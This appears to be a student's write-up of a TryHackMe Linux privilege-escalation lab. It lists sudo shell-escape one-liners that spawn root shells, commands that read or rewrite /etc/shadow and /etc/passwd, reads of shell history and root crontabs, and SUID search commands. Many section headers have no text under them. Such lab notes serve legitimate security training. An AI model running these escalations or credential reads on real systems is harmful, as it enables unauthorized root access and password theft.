Linux Privilege Escalation

Tib3rius Linux Privilege Escalation course from TryHackMe (with some overlap from TCM's arena)

TryHackMeLinux PrivEsc Write-Up

topics: Linux Privilege Escalation, post exploitation (looting)

  1. Service Exploits

  2. File Permissions

  3. Sudo Bypass

  4. Cron Jobs

  5. SUID/SGID Executables

  6. Passwords & Keys

  7. NFS

  8. Kernel Exploits

new tools: unixprivesc, LinPrivchecker, strace, perl, env, function, export, perl, mount

tools: nmapAutomator, nc, gcc, strings, enum4linux, LinPEAS, LinEnum, LSE, chmod, touch, find, msfvenom

Overview of Linux Privilege Escalation

As with any operating system, there are numerous ways to take advantage of system processes, configuration files, outdated kernel versions, OS specific vulnerabilities etc.

some specific ones mentioned in the room, techniques generalization and commonalities

helpful links and pdf of linux pocket guide and other sources like arch wiki, open source books

Cheatsheets

Service Exploits

ps -elf | grep root find all services and processes run by root

If we examine this command closely, we can see that it is running MySQL as the root user without a password defined. We can run commands through the service as the root user.

This information was taken from a known searchsploit exploit and is one of many examples of bypassing services run as root.

Weak File Permissions

/etc/shadow

This is the location of all hashed passwords of every user on the system including root. If these files are readable or writeable by the user, any password could be tampered with.

We can check our permissions with ls -la /etc/shadow

So we have read/write permissions for the file. We can view all password hashes and even change them. Lets read the file, store it in a text file and crack with john

Read

Write

We can make a new password using the $6$ encryption type (SHA-512) that we know googling or hash-identifier. Use mkpasswd and input the new password

/etc/passwd

This is the file that lists all system users and uid, as well as the home folder and default shell.

Checking permissions with ls -la /etc/passwd

We have read/write permissions for the user file. We can generate a new password hash and replace the x in the passwd file

We can also copy the contents of root and make a user newroot as an alias of root

Bypass Sudo

Shell Escape Sequences

GTFObins is collection of sudo, SUID and other bypass techniques that can be used for linux.

sudo -l lists all commands the user can use with sudo permissions

We can become root by

  • vim using sudo vim followed by :!bash (can also edit the sudoers file to include all)

  • nmap using sudo nmap --interactive followed by !sh

  • iftop using sudo iftop followed by shift+! and Command> /bin/sh

  • find using sudo find . -exec /bin/sh \; -quit

  • nano using sudo nano, ctrl+Rctrl+X, reset sh 1>&0 2>&0. Didnt work on this box but you can just edit the sudoers file

  • man using sudo man man followed by !/bin/sh

  • awk using sudo awk 'BEGIN {system("/bin/sh")}'

  • less using sudo less /etc/profile followed by !/bin/sh

  • ftp using sudo ftp followed by !/bin/sh

  • more using TERM= sudo more /etc/profile followed by !/bin/sh

The list is almost endless.

Environment Variables

Cron Jobs

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

Useful commands:

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

File Permissions

View system-wide cron tables: cat /etc/crontab

PATH Environment Variable

cat /etc/crontab

Wildcards

cat /etc/crontab && cat /usr/local/bin/compress.sh

The tar command is being used with a wildcard *

SUID/SGID Executables

An SUID is a file that allows a user to execute the file with the permissions of the file owner, an SGID is the same except with the group owner. If the owner is root, we can essentially run files with root permissions.

Known Exploits

find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null find all SUID files

find / -perm -g=s -type f 2>/dev/null find all SGID files

SUID file misconfigurations can be found on GTFOBins

Shared Object Injection

Environment Variables

Exploiting Shell Features

The following doesn't work for bash versions 4.4+ /bin/bash --version

Passwords & Keys

History Files

cat ~/.*history | less

Configuration Files

SSH Keys

NFS

Kernel Exploits

*Privilege Escalation Scripts

Numerous scripts we can use yada yada, Linux executables use the file extension .sh, we can search for these first

Find any file type using find . -type f -name '*.<FILETYPE>'

LinEnum

LinPEAS

LSE

Linux Exploit Suggestor 2

Unix PrivEsc

Linux PrivChecker

Last updated